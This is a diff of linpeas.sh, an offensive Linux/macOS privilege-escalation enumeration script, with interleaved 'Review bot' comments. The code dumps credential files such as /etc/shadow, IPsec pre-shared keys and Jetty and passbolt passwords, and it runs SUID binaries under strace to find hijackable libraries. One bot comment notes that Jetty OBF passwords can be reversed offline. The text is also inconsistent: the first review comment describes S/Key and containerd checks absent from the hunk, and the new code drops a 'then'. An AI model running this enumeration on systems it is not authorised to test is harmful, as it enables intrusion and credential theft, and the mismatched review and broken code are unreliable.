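Review bot: The S/Key and YubiKey checks in this hunk keep a broken comment filter: `grep -v \"^#\"` is written outside any quoting context, so the backslashes make grep receive the literal pattern `"^#"` (quote characters included) and no line is ever dropped, which means a commented-out `auth=...skey` entry in /etc/login.conf would still be reported as "System supports S/Key authentication". The commit only re-indents these two blocks, so the defect survives on the new side; the fix in both places is `if grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey; then` (and the same with `yubikey`). Since this file looks auto-generated, the change presumably belongs in the builder part that emits these sections rather than in linpeas.sh itself. A smaller nit in the same hunk: `ctr image list` in the containerd block is the only command there without `2>/dev/null`, so a permission error from ctr ends up in the report.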
@@ -3069,7 +3031,7 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Racoon Files (limit 70)" + print_2title "Analyzing Racoon Files (limit 70)" if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ]; then echo_not_found "racoon.conf"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ]; then echo_not_found "psk.txt"; fi; printf "%s" "$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 
@@ -3125,14 +3087,18 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then echo_not_found "passbolt.php"; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; + print_2title "Analyzing Jetty Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then echo_not_found "jetty-realm.properties"; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do ls -ld "$f" | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Interesting logs Files (limit 70)" + + + print_2title "Analyzing Interesting logs Files (limit 70)" if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then echo_not_found "access.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then echo_not_found "error.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Windows Files Files (limit 70)" + print_2title "Analyzing Windows Files Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then echo_not_found "unattend.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; if ! 
[ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then echo_not_found "*.rdg"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then echo_not_found "AppEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; @@ -3184,7 +3150,7 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then echo_not_found "wsl.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; - print_2title "Analyzing Other Interesting Files Files (limit 70)" + print_2title "Analyzing Other Interesting Files Files (limit 70)" if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then echo_not_found ".bashrc"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then echo_not_found ".google_authenticator"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then echo_not_found "hosts.equiv"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; 
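Review bot: The new Jetty check dumps every non-comment line of jetty-realm.properties with `sed -${E} "s,.*,${SED_RED},g"`, so a reader cannot tell the credential form apart: entries are `user: secret[,role...]` and the secret may be plaintext, `OBF:` (Jetty's reversible obfuscation, not a hash), `MD5:` or `CRYPT:`, and the reversible case is the one worth calling out. I would narrow the highlight to the secret token so that prefix stays visible, e.g. `sed -${E} "s,(OBF|MD5|CRYPT):[^,]+|:[[:space:]]*[^,]+,${SED_RED},g"`, or at least add a one-line hint under the title such as `echo "OBF: values are reversible (deobfuscate offline), MD5:/CRYPT: are hashes"`. As the surrounding sections appear generated from a file list, that tweak presumably goes into the Jetty entry's `bad_regex` in the builder input rather than here. Style nit: the two added blank `+` lines before "Analyzing Interesting logs Files" make this the only generated section followed by empty lines.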
@@ -3196,651 +3162,653 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then echo_not_found ".sudo_as_admin_successful"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; - echo "" - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if echo $CHECKS | grep -q interesting_files; +print_title "Interesting Files" +########################################### +#----------) Interesting files (----------# +########################################### -if echo $CHECKS | grep -q IntFiles; then - ########################################### - #----------) Interesting files (----------# - ########################################### - print_title "Interesting Files" +##-- IF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" +fi +suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi - ##-- IF) SUID - print_2title "SUID - Check easy privesc, exploits and write perms" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - if ! [ "$STRINGS" ]; then - echo_not_found "strings" - fi - if ! [ "$STRACE" ]; then - echo_not_found "strace" - fi - suids_files=$(find / -perm -4000 -type f ! 
-path "/dev/*" 2>/dev/null) - for s in $suids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total"; then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! 
[ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then - printf $ITALIC - echo "----------------------------------------------------------------------------------------" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH - export LD_LIBRARY_PATH="" - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC - export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH - echo "----------------------------------------------------------------------------------------" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - - ##-- IF) SGID - print_2title "SGID" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - sgids_files=$(find / -perm -2000 -type f ! 
-path "/dev/*" 2>/dev/null) - for s in $sgids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total";then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! 
[ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." 
- timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - ##-- IF) Misconfigured ld.so - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" - - ##-- IF) Capabilities - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed 
-${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi - done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi - - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," - fi - done - echo "" - - ##-- IF) Users with capabilities - print_2title "Users with capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - else echo_not_found "/etc/security/capability.conf" - fi - echo "" - - ##-- IF) Files with ACLs - print_2title "Files with ACLs (limited to 50)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - - if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! 
[ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - fi - echo "" - - ##-- IF) Files with ResourceFork - #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER - # print_2title "Files with ResourceFork" - # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" - # find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" - #fi - #echo "" - - ##-- IF) .sh files in PATH - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" - echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! 
[ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done - done - echo "" - - print_2title "Broken links in path" - echo $PATH | tr ":" "\n" | while read d; do - find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; - done - echo "" - - - if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications - fi - - ##-- IF) Unexpected folders in / - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi - echo "" - - ##-- IF) Files (scripts) in /etc/profile.d/ - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! 
[ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Files (scripts) in /etc/init.d/ - print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! 
[ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! 
[ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Hashes in passwd file - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... 
" - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - 